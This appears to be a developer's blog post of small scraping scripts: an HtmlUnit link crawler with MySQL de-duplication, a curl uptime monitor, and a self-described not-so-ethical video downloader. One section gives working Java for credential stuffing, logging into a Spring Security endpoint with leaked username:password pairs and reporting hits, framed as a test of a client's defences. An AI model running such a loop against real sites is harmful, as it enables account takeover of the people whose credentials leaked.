Web Scraping Examples
Over the years, I've built a collection of small scripts that I use to crawl and fetch data for myself. These are all pretty hacky and quick, but I often find them useful.
Scrape to MySQL
This particular script was used to pull links off a page at work. Every hour it crawls the page and collects domains. The domains themselves act as primary keys, which prevents duplicates. This is a good example of how to use HtmlUnit to fetch data.
import java.util.List;

import com.gargoylesoftware.htmlunit.BrowserVersion;
import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlAnchor;
import com.gargoylesoftware.htmlunit.html.HtmlDivision;

public void runMe() {
    try {
        webClient = new WebClient(BrowserVersion.FIREFOX_38);
        //webClient.getOptions().setThrowExceptionOnScriptError(false);
        page = webClient.getPage(url);
        //scrollToBottomOfPage();
        final List<?> sectionPlayers = page.getByXPath("(//div[@class='section-asdf'])"); // get all section players on the page
        for (int i = 0; i < sectionPlayers.size(); i++) { // loop through them
            System.out.println("NAWICE... Let's get the asdf links!");
            HtmlDivision htmlDivision = (HtmlDivision) sectionPlayers.get(i);
            if (htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf").size() == 1) { // toggle link present: more than one blog posted
                List<HtmlAnchor> repostLink = htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf"); // get the link that shows the posts
                repostLink.get(0).click();
                webClient.waitForBackgroundJavaScript(5000); // wait for the ajax page to reload
                printLinksInSectionPlayer(htmlDivision); // print the newly visible links
                List<HtmlAnchor> showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-asdf"); // get the show-more link
                if (showMoreLink.size() == 1) { // if we have a show-more link...
                    showMoreLink.get(0).click(); // click it
                    webClient.waitForBackgroundJavaScript(5000); // wait for the ajax
                    printLinksInSectionPlayer(htmlDivision); // print the newly visible links
                    while (htmlDivision.getElementsByAttribute("a", "class", "fav-asdf").size() == 2) { // two links means we have next and prev buttons
                        showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-paging"); // get the next and prev buttons
                        showMoreLink.get(1).click(); // click the next button
                        webClient.waitForBackgroundJavaScript(5000);
                        printLinksInSectionPlayer(htmlDivision); // print the links
                    }
                }
            } else {
                printLinksInSectionPlayer(htmlDivision); // only one blog post, just print it
            }
        }
        webClient.closeAllWindows();
    } catch (Exception e) {
        System.out.println("Welp, something went wrong...");
        e.printStackTrace();
    }
    System.out.println("DING! Toast is done!");
}
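The MySQL half isn't shown above, but the idea is simple: insert each domain with the domain itself as the primary key, so re-crawling the same page can't create duplicates. Here's a minimal sketch of that insert, assuming a domains table and JDBC connection details that aren't from the original script:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;

public class DomainStore {
    // Hypothetical connection settings; swap in your own host, schema, and credentials.
    private static final String JDBC_URL = "jdbc:mysql://localhost:3306/scraper";

    public void saveDomain(String domain) throws Exception {
        // Assumes: CREATE TABLE domains (domain VARCHAR(255) PRIMARY KEY);
        // INSERT IGNORE silently skips rows whose primary key already exists,
        // which is what de-duplicates the hourly crawl.
        try (Connection con = DriverManager.getConnection(JDBC_URL, "user", "pass");
             PreparedStatement ps = con.prepareStatement(
                     "INSERT IGNORE INTO domains (domain) VALUES (?)")) {
            ps.setString(1, domain);
            ps.executeUpdate();
        }
    }
}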
Credential Stuffing
After the Yahoo! email security breach, we discovered automated scripts using credential stuffing methods to access a client's domain. I wrote a similar attack and used it as a test case to prove our solution worked. Here's a sample of it.
import java.io.DataOutputStream;
import java.net.HttpCookie;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;
import java.util.List;

private String getAuthToken(String username, String password) throws Exception {
    String url = "https://" + endpointPrefix + ".example.com/j_spring_security_check";
    URL obj = new URL(url);
    HttpURLConnection con = (HttpURLConnection) obj.openConnection();
    con.setInstanceFollowRedirects(false);
    // add request header
    con.setRequestMethod("POST");
    // URL-encode the credentials so special characters survive the POST body
    String urlParameters = "j_username=" + URLEncoder.encode(username, "UTF-8")
            + "&j_password=" + URLEncoder.encode(password, "UTF-8");
    // send the POST request
    con.setDoOutput(true);
    DataOutputStream wr = new DataOutputStream(con.getOutputStream());
    wr.writeBytes(urlParameters);
    wr.flush();
    wr.close();
    printTheRequest(con);
    String authToken = "";
    List<String> cookieHeaders = con.getHeaderFields().get("Set-Cookie");
    if (cookieHeaders != null) { // no Set-Cookie header means the login failed
        for (String cookieHeader : cookieHeaders) {
            HttpCookie cookie = HttpCookie.parse(cookieHeader).get(0);
            if (cookie.getName().equals("EXAMPLE_WD_WLJSESSIONID")) {
                authToken = cookie.getValue();
            }
        }
    }
    return authToken;
}
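The stuffing part is just a loop over leaked credentials feeding that method. A rough sketch of the driver, assuming a hypothetical creds.txt with one user:password pair per line (not part of the original test case):

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.List;

public void runStuffingTest() throws Exception {
    // Hypothetical input file: one "username:password" pair per line.
    List<String> lines = Files.readAllLines(Paths.get("creds.txt"));
    for (String line : lines) {
        String[] parts = line.split(":", 2);
        String token = getAuthToken(parts[0], parts[1]);
        // An empty token means the login was rejected; anything else is a hit.
        if (!token.isEmpty()) {
            System.out.println("HIT: " + parts[0]);
        }
    }
}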
Monitor URL
This little bash script comes in handy when you're trying to prove a URL is inconsistently loading. Every 20 minutes it uses curl to visit a page and logs the verbose output, response code included. In the case of this issue, our server used a different DNS server than our firewall, and received an IP address to connect to that was not opened.
#!/bin/bash
# I often use this script to monitor connectivity. The output
# can be sent to your infrastructure team to prove a point...
while true
do
    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    echo `date` >> jm_watch_url.txt
    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    curl -v https://www.google.com/recaptcha/api/siteverify 2>&1 | tee -a jm_watch_url.txt
    sleep 1200 # 20 minutes
done
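If all you really want in the log is the status code, the same idea fits in a few lines of Java. A sketch, assuming the same URL and interval (the class name and log handling here are mine, not from the original):

import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Date;

public class WatchUrl {
    public static void main(String[] args) throws Exception {
        while (true) {
            HttpURLConnection con = (HttpURLConnection)
                    new URL("https://www.google.com/recaptcha/api/siteverify").openConnection();
            // Print a timestamped response code; redirect stdout to a file to keep a log.
            System.out.println(new Date() + " -> " + con.getResponseCode());
            con.disconnect();
            Thread.sleep(20 * 60 * 1000); // 20 minutes, matching the bash version
        }
    }
}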
Video Scraping
Alright, maybe this one isn't all that ethical. I came across a series of videos online, but they were buried in just about the worst online ads. This script was used to pull a list of all the URLs and store them in a local in-memory database (actually persisted to your local disk). That meant I could shut the script down and let it resume downloading the videos later, and I didn't have to restart from video one if something went wrong.
import org.springframework.boot.CommandLineRunner;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.Bean;

@Bean
public CommandLineRunner commandLineRunner(ApplicationContext ctx) {
    // Return a runner so the work happens after the context starts,
    // instead of during bean creation.
    return args -> {
        //GetWebsiteB getWebsiteB = ctx.getBean(GetWebsiteB.class);
        //getWebsiteB.gatherLinks();
        //getWebsiteB.downloadLinks();
        GetWebsiteA getWebsiteA = ctx.getBean(GetWebsiteA.class);
        getWebsiteA.gatherLinks();
        getWebsiteA.downloadLinks();
    };
}
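The resume trick is all in the bookkeeping: each URL row carries a downloaded flag, and on startup the downloader only picks up rows that aren't flagged yet. A minimal sketch of that table and query, assuming an H2 file-backed database (the original's actual schema and names aren't shown):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class LinkStore {
    // H2 in file mode: queried like an in-memory DB, but persisted under ./data on disk.
    private static final String JDBC_URL = "jdbc:h2:./data/videolinks";

    public void resumeDownloads() throws Exception {
        try (Connection con = DriverManager.getConnection(JDBC_URL)) {
            try (Statement st = con.createStatement()) {
                st.execute("CREATE TABLE IF NOT EXISTS links ("
                        + "url VARCHAR(2048) PRIMARY KEY, "
                        + "downloaded BOOLEAN DEFAULT FALSE)");
            }
            // Only pick up what a previous run didn't finish.
            List<String> pending = new ArrayList<>();
            try (Statement st = con.createStatement();
                 ResultSet rs = st.executeQuery("SELECT url FROM links WHERE downloaded = FALSE")) {
                while (rs.next()) {
                    pending.add(rs.getString("url"));
                }
            }
            try (PreparedStatement mark = con.prepareStatement(
                    "UPDATE links SET downloaded = TRUE WHERE url = ?")) {
                for (String url : pending) {
                    // ... download the file here, then flag it so a restart skips it.
                    mark.setString(1, url);
                    mark.executeUpdate();
                }
            }
        }
    }
}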